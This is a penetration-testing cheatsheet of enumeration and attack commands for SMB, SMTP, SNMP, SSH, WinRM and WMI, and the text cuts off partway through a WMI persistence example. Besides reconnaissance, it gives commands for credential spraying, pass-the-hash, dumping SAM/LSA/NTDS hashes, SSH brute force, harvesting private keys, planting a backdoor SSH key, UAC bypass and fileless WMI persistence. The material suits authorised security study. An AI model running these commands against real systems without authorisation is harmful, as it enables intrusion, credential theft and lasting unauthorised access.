Footprinting

SMB Enumeration Cheatsheet Default Ports: 445 (TCP), 139 (TCP/NetBIOS), 137–138 (UDP) Initial Scanning nmap -p 139,445 -sV <ip> nmap -p 445 --script smb-os-discovery <ip> nmap -p 445 --script smb-security-mode <ip> nmap -p 445 --script smb2-security-mode <ip> nmap -p 139,445 --script smb-* <ip> # All SMB scripts nmap -p 445 --script smb-vuln-* <ip> # All vuln checks NetBIOS / NBT Scanning nbtscan <ip> nbtscan -r 192.168.1.0/24 nmblookup -A <ip> enum4linux / enum4linux-ng # Classic enum4linux -a <ip> # All checks enum4linux -u <user> -p <pass> <ip> # Authenticated enum4linux -S <ip> # Shares only enum4linux -U <ip> # Users only enum4linux -P <ip> # Password policy # Newer (recommended) enum4linux-ng -A <ip> enum4linux-ng -A <ip> -u <user> -p <pass> enum4linux-ng -A <ip> -oA output smbclient # List shares smbclient -L //<ip>/ -N # Null session smbclient -L //<ip>/ -U <user>%<pass> # Authenticated # Connect to share smbclient //<ip>/<share> -N smbclient //<ip>/<share> -U <user>%<pass> smbclient //<ip>/<share> -U <domain>/<user>%<pass> # Within smbclient shell ls # List files cd <dir> # Change directory get <file> # Download file put <file> # Upload file recurse ON # Enable recursive operations prompt OFF # Disable prompts mget * # Download everything mput * # Upload everything CrackMapExec (CME) # Basic info crackmapexec smb <ip> crackmapexec smb 192.168.1.0/24 # Authenticated enum crackmapexec smb <ip> -u <user> -p <pass> crackmapexec smb <ip> -u <user> -p <pass> --shares crackmapexec smb <ip> -u <user> -p <pass> --users crackmapexec smb <ip> -u <user> -p <pass> --groups crackmapexec smb <ip> -u <user> -p <pass> --sessions crackmapexec smb <ip> -u <user> -p <pass> --loggedon-users crackmapexec smb <ip> -u <user> -p <pass> --local-groups # Credential spraying crackmapexec smb 192.168.1.0/24 -u <user> -p <pass> --continue-on-success # Pass-the-Hash crackmapexec smb <ip> -u <user> -H <nthash> # Command execution crackmapexec smb <ip> -u <user> -p <pass> -x 'whoami' # CMD crackmapexec smb <ip> -u <user> -p <pass> -X 'whoami' # PowerShell # Dump SAM/LSA crackmapexec smb <ip> -u <user> -p <pass> --sam crackmapexec smb <ip> -u <user> -p <pass> --lsa crackmapexec smb <ip> -u <user> -p <pass> -M ntdsutil # NTDS.dit impacket Tools python3 smbclient.py <domain>/<user>:<pass>@<ip> python3 samrdump.py <domain>/<user>:<pass>@<ip> python3 rpcdump.py <domain>/<user>:<pass>@<ip> python3 lookupsid.py <domain>/<user>:<pass>@<ip> python3 secretsdump.py <domain>/<user>:<pass>@<ip> # Dump all hashes python3 secretsdump.py -just-dc-ntlm <domain>/<user>:<pass>@<ip> Mounting SMB Shares # Linux mount sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass> sudo mount -t cifs //<ip>/<share> /mnt/smb -o username=<user>,password=<pass>,domain=<domain> Key Vulnerabilities CVE Name Description CVE-2017-0144 EternalBlue / MS17-010 SMBv1 RCE — WannaCry / NotPetya CVE-2020-0796 SMBGhost SMBv3.1.1 compression RCE CVE-2021-34527 PrintNightmare Print Spooler RCE via SMB # EternalBlue check nmap -p 445 --script smb-vuln-ms17-010 <ip> use auxiliary/scanner/smb/smb_ms17_010 # SMBGhost check nmap -p 445 --script smb-vuln-cve2020-0796 <ip> use auxiliary/scanner/smb/cve_2020_0796_smbghost

SMTP Enumeration Cheatsheet Default Ports: 25 (SMTP), 587 (Submission/STARTTLS), 465 (SMTPS) Banner Grabbing nc -nv <ip> 25 telnet <ip> 25 openssl s_client -starttls smtp -connect <ip>:587 openssl s_client -connect <ip>:465 Manual SMTP Commands HELO <domain> # Basic hello EHLO <domain> # Extended hello (lists capabilities) AUTH LOGIN # Start base64 auth AUTH PLAIN # Plain auth VRFY <user> # Verify if user exists EXPN <list> # Expand mailing list members RCPT TO:<user@domain> # Verify recipient (within MAIL flow) MAIL FROM:<[email protected]> RCPT TO:<target@domain> DATA # Begin message body . # End message (single dot on its own line) RSET # Reset connection state QUIT Capabilities Enumeration # See what the server supports after EHLO nc <ip> 25 EHLO test.com # Common capabilities to note: # STARTTLS, AUTH LOGIN/PLAIN/NTLM, SIZE, PIPELINING, VRFY, EXPN User Enumeration # smtp-user-enum tool smtp-user-enum -M VRFY -U users.txt -t <ip> smtp-user-enum -M EXPN -U users.txt -t <ip> smtp-user-enum -M RCPT -U users.txt -t <ip> -D <domain> # Manual VRFY loop for user in $(cat users.txt); do echo VRFY $user | nc -nv -w 1 <ip> 25 2>/dev/null | grep "^250" done # Response codes: # 250 = user exists # 252 = can't verify but will attempt delivery # 550 = user does not exist Nmap Scripts nmap -p 25 --script smtp-commands <ip> nmap -p 25 --script smtp-enum-users <ip> nmap -p 25 --script smtp-open-relay <ip> nmap -p 25 --script smtp-brute <ip> nmap -p 25 --script smtp-ntlm-info <ip> # Windows NTLM info leak nmap -p 25 --script smtp-vuln-cve2010-4344 <ip> # Exim heap overflow nmap -p 25,587,465 --script smtp-* <ip> Open Relay Testing nc <ip> 25 EHLO test.com MAIL FROM:<[email protected]> RCPT TO:<[email protected]> # If accepted = open relay! DATA Subject: relay test This is a test. . QUIT # Automated nmap -p 25 --script smtp-open-relay \ --script-args [email protected],[email protected] <ip> Metasploit use auxiliary/scanner/smtp/smtp_version use auxiliary/scanner/smtp/smtp_enum use auxiliary/scanner/smtp/smtp_relay NTLM Info Leak (Windows SMTP) # Triggers Windows SMTP servers to reveal hostname, domain, OS version nmap -p 25 --script smtp-ntlm-info <ip> # Manual nc <ip> 25 EHLO test AUTH NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA= # Decode the Base64 response with ntlmdecoder or responder Useful Wordlists /usr/share/seclists/Usernames/top-usernames-shortlist.txt /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt

SNMP Enumeration Cheatsheet Default Ports: 161 (UDP — queries), 162 (UDP — traps) SNMP Versions Version Auth Notes v1 Community string Cleartext, oldest v2c Community string Cleartext, most common v3 Username + auth + encryption Secure, rarely misconfigured Detection nmap -sU -p 161 <ip> nmap -sU -p 161 -sV <ip> nmap -sU -p 161 --script snmp-info <ip> Community String Brute Force # onesixtyone (fast UDP brute) onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <ip> onesixtyone -c community.txt -i ips.txt # Nmap nmap -sU -p 161 --script snmp-brute <ip> nmap -sU -p 161 --script snmp-brute \ --script-args snmp-brute.communitiesdb=communities.txt <ip> # Metasploit use auxiliary/scanner/snmp/snmp_login set RHOSTS <ip> run snmpwalk — Walking the MIB Tree # Full walk (v1/v2c) snmpwalk -v1 -c public <ip> snmpwalk -v2c -c public <ip> # Target specific OIDs snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.1 # System info snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.4.2 # Running processes snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.25.6.3 # Installed software snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.6.13.1.3 # Open TCP ports snmpwalk -v2c -c public <ip> 1.3.6.1.4.1.77.1.2.25 # Windows user accounts snmpwalk -v2c -c public <ip> 1.3.6.1.2.1.2.2 # Network interfaces # SNMPv3 snmpwalk -v3 -u <user> -l AuthPriv \ -a MD5 -A <authpass> -x DES -X <privpass> <ip> snmpget — Single OID Query snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.1.0 # sysDescr snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.5.0 # sysName (hostname) snmpget -v2c -c public <ip> 1.3.6.1.2.1.1.6.0 # sysLocation snmp-check snmp-check <ip> snmp-check <ip> -c public snmp-check <ip> -c public -v 2c braa — Bulk SNMP braa public@<ip>:.1.3.6.* braa [email protected]:.1.3.6.1.2.1.1.1.0 Nmap SNMP Scripts nmap -sU -p 161 --script snmp-info <ip> nmap -sU -p 161 --script snmp-sysdescr <ip> nmap -sU -p 161 --script snmp-interfaces <ip> nmap -sU -p 161 --script snmp-processes <ip> nmap -sU -p 161 --script snmp-win32-users <ip> nmap -sU -p 161 --script snmp-win32-services <ip> nmap -sU -p 161 --script snmp-win32-software <ip> nmap -sU -p 161 --script snmp-* <ip> Key OIDs Reference OID Description 1.3.6.1.2.1.1.1.0 System description 1.3.6.1.2.1.1.3.0 System uptime 1.3.6.1.2.1.1.5.0 Hostname 1.3.6.1.2.1.1.6.0 System location 1.3.6.1.2.1.25.1.6.0 Running OS processes 1.3.6.1.2.1.25.4.2.1.2 Process names 1.3.6.1.2.1.25.6.3.1.2 Installed packages 1.3.6.1.4.1.77.1.2.25 Windows user accounts 1.3.6.1.2.1.6.13.1.3 TCP open ports 1.3.6.1.2.1.2.2.1.2 Interface names 1.3.6.1.2.1.2.2.1.11 Interface in-packets Common Community Strings public private manager community snmp cisco monitor 0 internal

SSH Enumeration Cheatsheet Default Port: 22 (TCP) Banner & Info Gathering nc -nv <ip> 22 # Banner grab ssh -v <user>@<ip> # Verbose handshake output ssh -V # Local SSH client version # Nmap scripts nmap -p 22 -sV <ip> nmap -p 22 --script ssh-hostkey <ip> nmap -p 22 --script ssh2-enum-algos <ip> nmap -p 22 --script ssh-auth-methods \ --script-args ssh.user=<user> <ip> nmap -p 22 --script sshv1 <ip> # Check for insecure SSHv1 ssh-audit (Configuration Security Check) ssh-audit <ip> ssh-audit <ip> -p 22 # Flags to note: # [fail] = critical issue # [warn] = should be fixed # Lists: KEX, hostkey, encryption, MAC algorithms User Enumeration # CVE-2018-15473 (OpenSSH < 7.7 username enumeration) python3 ssh_user_enum.py --userList users.txt --ip <ip> # Metasploit use auxiliary/scanner/ssh/ssh_enumusers set RHOSTS <ip> set USER_FILE users.txt run Brute Force # Hydra hydra -l <user> -P wordlist.txt ssh://<ip> hydra -L users.txt -P wordlist.txt ssh://<ip> hydra -l <user> -P wordlist.txt -s 2222 ssh://<ip> # Custom port # Medusa medusa -h <ip> -u <user> -P wordlist.txt -M ssh # Nmap nmap -p 22 --script ssh-brute <ip> nmap -p 22 --script ssh-brute \ --script-args userdb=users.txt,passdb=pass.txt <ip> # Metasploit use auxiliary/scanner/ssh/ssh_login set RHOSTS <ip> set USERNAME <user> set PASS_FILE wordlist.txt run Key-Based Attacks # Connect with private key ssh -i id_rsa <user>@<ip> chmod 600 id_rsa && ssh -i id_rsa <user>@<ip> # Crack passphrase on private key ssh2john id_rsa > ssh_hash.txt john ssh_hash.txt --wordlist=wordlist.txt hashcat -m 22921 ssh_hash.txt wordlist.txt # Ed25519 hashcat -m 22911 ssh_hash.txt wordlist.txt # RSA # Scan for keys (key harvesting after initial access) find / -name "id_rsa" -o -name "id_ecdsa" -o -name "id_ed25519" 2>/dev/null find / -name "*.pem" -o -name "*.key" 2>/dev/null SSH Key Scanning # Collect host keys ssh-keyscan <ip> ssh-keyscan -t rsa,ecdsa,ed25519 <ip> ssh-keyscan -p 2222 <ip> # Scan range ssh-keyscan -f hosts.txt > known_hosts Interesting Files to Grab Post-Access ~/.ssh/id_rsa # Private key ~/.ssh/id_rsa.pub # Public key ~/.ssh/authorized_keys # Authorized keys (add yours for persistence) ~/.ssh/known_hosts # Previous connections (network map) /etc/ssh/sshd_config # Server configuration /etc/ssh/ssh_host_rsa_key # Host private key Add Backdoor SSH Key (Post-Exploitation) # On attacker machine ssh-keygen -t rsa -b 4096 -f backdoor # On target (append to authorized_keys) echo "ssh-rsa AAAA..." >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys # Connect back ssh -i backdoor <user>@<ip> Common Misconfigurations to Check PermitRootLogin yes — Root login allowed PasswordAuthentication yes — Passwords accepted (brutable) PermitEmptyPasswords yes — Blank passwords allowed AuthorizedKeysFile .ssh/authorized_keys — Key auth path AllowUsers / DenyUsers — User restrictions Port 22 — Non-standard port may indicate stealth

WinRM Enumeration Cheatsheet Default Ports: 5985 (HTTP / WS-Management), 5986 (HTTPS) What is WinRM? Windows Remote Management — Microsoft’s implementation of WS-Management. Used for remote PowerShell, remote command execution, and administration. Detection nmap -p 5985,5986 <ip> nmap -p 5985,5986 -sV <ip> curl -s http://<ip>:5985/wsman curl -sk https://<ip>:5986/wsman Evil-WinRM # Password auth (HTTP) evil-winrm -i <ip> -u <user> -p <pass> # SSL (HTTPS, port 5986) evil-winrm -i <ip> -u <user> -p <pass> -S # Pass-the-Hash (NTLM) evil-winrm -i <ip> -u <user> -H <nthash> # With scripts and executables directory evil-winrm -i <ip> -u <user> -p <pass> \ -s /path/to/ps1_scripts/ \ -e /path/to/executables/ # Within evil-winrm shell menu # Show built-in commands upload /local/file.exe # Upload file download C:ile.txt # Download file Invoke-Binary /local/exe # Run local exe in memory bypass_uac # UAC bypass CrackMapExec # Test credentials crackmapexec winrm <ip> -u <user> -p <pass> crackmapexec winrm 192.168.1.0/24 -u <user> -p <pass> # Credential spray crackmapexec winrm <ip> -u users.txt -p <pass> crackmapexec winrm <ip> -u <user> -p wordlist.txt # Pass-the-Hash crackmapexec winrm <ip> -u <user> -H <nthash> # Execute commands crackmapexec winrm <ip> -u <user> -p <pass> -x 'whoami' # CMD crackmapexec winrm <ip> -u <user> -p <pass> -X 'whoami' # PowerShell crackmapexec winrm <ip> -u <user> -p <pass> -X 'Get-Process' PowerShell / Windows Native # Test WinRM connectivity Test-WSMan -ComputerName <ip> Test-WSMan -ComputerName <ip> -UseSSL # Interactive remote session Enter-PSSession -ComputerName <ip> -Credential <user> Enter-PSSession -ComputerName <ip> -UseSSL -Credential <user> # Non-interactive / scripted $cred = Get-Credential $sess = New-PSSession -ComputerName <ip> -Credential $cred Invoke-Command -Session $sess -ScriptBlock { whoami; hostname } Invoke-Command -ComputerName <ip> -Credential $cred -ScriptBlock { ipconfig } # Copy files over WinRM Copy-Item -Path C:\localile.exe -Destination C: emote\ -ToSession $sess Copy-Item -Path C: emote\loot.txt -Destination C:\local\ -FromSession $sess impacket # winrm_exec (alternative) python3 winrm_exec.py <domain>/<user>:<pass>@<ip> Brute Force crackmapexec winrm <ip> -u <user> -p wordlist.txt hydra -l <user> -P wordlist.txt <ip> -s 5985 http-post-form \ "/wsman:Username=^USER^&Password=^PASS^:401" Common Scenarios Pwned user is in group: "Remote Management Users" → Can use WinRM "Administrators" → Full access via WinRM Check group membership: net localgroup "Remote Management Users" Key Facts Requires user to be in Remote Management Users or Administrators group Can be enabled with: Enable-PSRemoting -Force Firewall rule: WinRM-HTTP-In-TCP (port 5985) Often enabled on Domain Controllers and management servers

WMI Enumeration Cheatsheet Default Ports: 135 (DCOM endpoint mapper), dynamic high ports (TCP 49152–65535) What is WMI? Windows Management Instrumentation — a core Windows API for querying system state and executing code remotely. Uses DCOM over RPC. Detection nmap -p 135 <ip> nmap -p 135 -sV <ip> nmap -p 135 --script msrpc-enum <ip> impacket — wmiexec.py # Interactive shell python3 wmiexec.py <domain>/<user>:<pass>@<ip> # Single command python3 wmiexec.py <domain>/<user>:<pass>@<ip> "whoami" python3 wmiexec.py <domain>/<user>:<pass>@<ip> "ipconfig /all" # Pass-the-Hash python3 wmiexec.py -hashes :<nthash> <domain>/<user>@<ip> python3 wmiexec.py -hashes <lmhash>:<nthash> <domain>/<user>@<ip> # Without domain (local account) python3 wmiexec.py ./<user>:<pass>@<ip> CrackMapExec crackmapexec wmi <ip> -u <user> -p <pass> crackmapexec wmi <ip> -u <user> -p <pass> -x 'whoami' crackmapexec wmi <ip> -u <user> -H <nthash> crackmapexec wmi 192.168.1.0/24 -u <user> -p <pass> PowerShell WMI (Local & Remote) # Local system queries Get-WmiObject -Class Win32_OperatingSystem Get-WmiObject -Class Win32_ComputerSystem Get-WmiObject -Class Win32_Process Get-WmiObject -Class Win32_UserAccount Get-WmiObject -Class Win32_Group Get-WmiObject -Class Win32_NetworkAdapterConfiguration | Where IPAddress -ne $null Get-WmiObject -Class Win32_Service | Where-Object { $_.State -eq "Running" } Get-WmiObject -Class Win32_Product # Installed software (slow) Get-WmiObject -Class Win32_LogicalDisk Get-WmiObject -Class Win32_StartupCommand # Startup items # Modern equivalent (CIM) Get-CimInstance -ClassName Win32_OperatingSystem Get-CimInstance -ClassName Win32_Process # Remote queries $cred = Get-Credential Get-WmiObject -Class Win32_OperatingSystem -ComputerName <ip> -Credential $cred Get-WmiObject -Class Win32_Process -ComputerName <ip> -Credential $cred PowerShell WMI Remote Code Execution # Execute command via WMI (leaves process behind) $cred = Get-Credential Invoke-WmiMethod -Class Win32_Process -Name Create ` -ArgumentList "cmd.exe /c whoami > C:\output.txt" ` -ComputerName <ip> -Credential $cred # Check output Get-WmiObject -Class CIM_DataFile -Filter "Name='C:\output.txt'" ` -ComputerName <ip> -Credential $cred wmic (Legacy CLI — Windows) :: Local wmic os get Caption,Version,BuildNumber wmic process list brief wmic useraccount list brief wmic group list brief wmic service where "State='Running'" list brief wmic product get Name,Version :: Installed software wmic startupinfo list full :: Remote wmic /node:<ip> /user:<user> /password:<pass> os get Caption wmic /node:<ip> /user:<user> /password:<pass> process call create "cmd.exe /c whoami > C:\out.txt" wmic /node:<ip> /user:<user> /password:<pass> useraccount list brief WQL Queries # WQL = WMI Query Language (SQL-like) Get-WmiObject -Query "SELECT * FROM Win32_Process WHERE Name='lsass.exe'" Get-WmiObject -Query "SELECT * FROM Win32_Service WHERE StartMode='Auto' AND State='Stopped'" Get-WmiObject -Query "SELECT * FROM Win32_UserAccount WHERE LocalAccount=True" Metasploit use exploit/windows/smb/psexec # Uses WMI/DCOM under the hood use exploit/windows/local/wmi # Post-exploitation WMI persistence use auxiliary/scanner/winrm/winrm_wql # WQL via WinRM WMI Persistence (Post-Exploitation) # Create permanent WMI event subscription (fileless persistence) $filter = Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{ Name = "PentestFilter" EventNameSpace = "root